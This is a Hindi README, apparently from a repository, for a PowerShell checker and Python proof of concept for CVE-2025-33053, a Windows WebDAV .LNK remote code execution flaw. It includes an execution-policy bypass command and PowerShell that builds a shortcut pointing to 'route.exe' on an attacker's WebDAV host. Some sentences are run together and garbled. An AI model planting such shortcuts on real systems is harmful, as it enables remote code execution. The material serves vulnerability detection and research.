
CVE-2025-33053 जाँचकर्ता और PoC
जाँचकर्ता का प्रमाण
PoC का प्रमाण
CVE-2025-33053 की जाँच और संभावित शोषण प्रदर्शित करने के लिए उपकरणों का एक पूरा सेट, जो विंडोज सिस्टम को प्रभावित करने वाली एक गंभीर WebDAV-आधारित दूरस्थ कोड निष्पादन (RCE) भेद्यता है।
CVE-2025-33053 हमलावरों को .LNK शॉर्टकट फ़ाइलों का शोषण करने की अनुमति देता है जो दुर्भावनापूर्ण रिमोट WebDAV शेयरों को संदर्भित करती हैं, जिससे प्रभावित सिस्टम पर दूरस्थ कोड निष्पादन (RCE) हो सकता है।
.LNK फ़ाइलों के माध्यम से किया जाए।.LNK फ़ाइल या सीधे UNC पथ तक पहुँच — यह एक रिमोट UNC पथ को इंगित करता है जैसे:.LNK तक पहुँचा जाता है या UNC पथ मैन्युअल रूप से ब्राउज़ किया जाता है (उदाहरण के लिए, फ़ाइल एक्सप्लोरर के माध्यम से): - WebClient सेवा WebDAV के माध्यम से रिमोट UNC स्थान पर संचार आरंभ करती है। - सिस्टम हमलावर के सर्वर से मेटाडेटा क्वेरी करने के लिए PROPFIND अनुरोध भेजता है।CVE-2025-33053_checker.ps1)| जाँच | उद्देश्य |
|---|---|
| 🔍 WebClient सेवा स्थिति | पुष्टि करता है कि WebDAV समर्थन सक्रिय और चल रहा है या नहीं। |
| 🔍 Test-Path के माध्यम से UNC पथ हैंडलिंग | परीक्षण करता है कि सिस्टम रिमोट WebDAV UNC पथों को हल करता है या नहीं (CVE शोषण के लिए मुख्य पूर्व शर्त)। |
PowerShell को व्यवस्थापक के रूप में खोलें।
यदि स्क्रिप्ट निष्पादन प्रतिबंधित है, तो चलाएँ:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
यह क्या करता है:
उपयोग:
python3 CVE-2025-33053_PoC.py --port 8000
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ वास्तविक UNC पथ समाधान का उपयोग करता है — कोई सिमुलेशन नहीं। ✔️ OS द्वारा ट्रिगर किए गए वास्तविक PROPFIND अनुरोधों को कैप्चर करता है — CVE शोषण के लिए आवश्यक सटीक व्यवहार। ✔️ पेलोड निष्पादित किए बिना या नुकसान पहुँचाए बिना भेद्यता का वास्तविक नेटवर्क-स्तरीय साक्ष्य प्रदर्शित करता है।
यह PoC लक्ष्य प्रणाली का शोषण या नुकसान नहीं पहुँचाता है — यह केवल अंतर्निहित कमजोर व्यवहार का पता लगाता है। नियंत्रित वातावरण में या स्पष्ट प्राधिकरण के साथ उपयोग के लिए अभिप्रेत है। वास्तविक सिस्टम व्यवहार प्रदर्शित करता है — कोई नकली सिमुलेशन नहीं। केवल शैक्षिक उद्देश्यों के लिए उपयोग करें। अनधिकृत सिस्टम पर न चलाएँ।
MIT लाइसेंस — केवल शैक्षिक, शोध और रक्षात्मक उद्देश्यों के लिए निःशुल्क।
पुल रिक्वेस्ट का स्वागत है — पहचान में सुधार करें, सुविधाएँ जोड़ें, या सुधार सुझाएँ।
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है। उन सिस्टमों पर दुरुपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, सख्त वर्जित है।